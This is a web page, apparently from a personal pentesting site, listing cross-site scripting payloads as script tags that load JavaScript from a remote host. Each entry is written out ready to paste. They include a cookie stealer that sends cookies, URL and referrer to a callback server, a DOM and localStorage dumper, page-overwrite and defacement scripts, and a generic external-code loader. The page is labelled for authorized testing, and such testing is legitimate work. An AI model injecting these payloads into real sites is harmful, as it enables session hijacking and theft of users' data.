← Back to Scripts

⚡ XSS Payload Arsenal

Cross-site scripting payloads for authorized security testing

🍪 Cookie & Data Exfiltration

Cookie Stealer (Full Data)

Exfiltrates cookies, URL, referrer, and timestamp to callback server

steal.js <script src="https://scripts.l4ughingm4n.dev/xss/steal.js"></script>

Cookie Exfiltration

Simple cookie stealer with minimal footprint

cookie-exfil.js <script src="https://scripts.l4ughingm4n.dev/xss/cookie-exfil.js"></script>

Minimal Payload

Shortest possible XSS payload for tight character limits

m.js <script src="https://scripts.l4ughingm4n.dev/xss/m.js"></script>

DOM Dumper

Exfiltrates entire DOM structure and localStorage contents

dump.js <script src="https://scripts.l4ughingm4n.dev/xss/dump.js"></script>

📝 DOM Manipulation

Background Color Change

Changes page background color for visual confirmation

bg-color.js <script src="https://scripts.l4ughingm4n.dev/xss/bg-color.js"></script>

Background Image Change

Sets custom background image on target page

bg-img.js <script src="https://scripts.l4ughingm4n.dev/xss/bg-img.js"></script>

Page Title Change

Modifies document title for PoC demonstration

title.js <script src="https://scripts.l4ughingm4n.dev/xss/title.js"></script>

Body Overwrite

Replaces entire page content with custom HTML

overwrite.js <script src="https://scripts.l4ughingm4n.dev/xss/overwrite.js"></script>

Element Remover

Removes specific DOM elements by ID

remove-elem.js <script src="https://scripts.l4ughingm4n.dev/xss/remove-elem.js"></script>

🔔 Basic Alerts & PoCs

Alert Origin

Displays window.origin in alert dialog

alert.js <script src="https://scripts.l4ughingm4n.dev/xss/alert.js"></script>

Image Error Alert

Triggers XSS via image onerror event

img-error.js <script src="https://scripts.l4ughingm4n.dev/xss/img-error.js"></script>

Print Dialog

Triggers browser print dialog for PoC

print.js <script src="https://scripts.l4ughingm4n.dev/xss/print.js"></script>

🔗 External Script Loader

External Script

Loads external JavaScript payload from remote server

external.js <script src="https://scripts.l4ughingm4n.dev/xss/external.js"></script>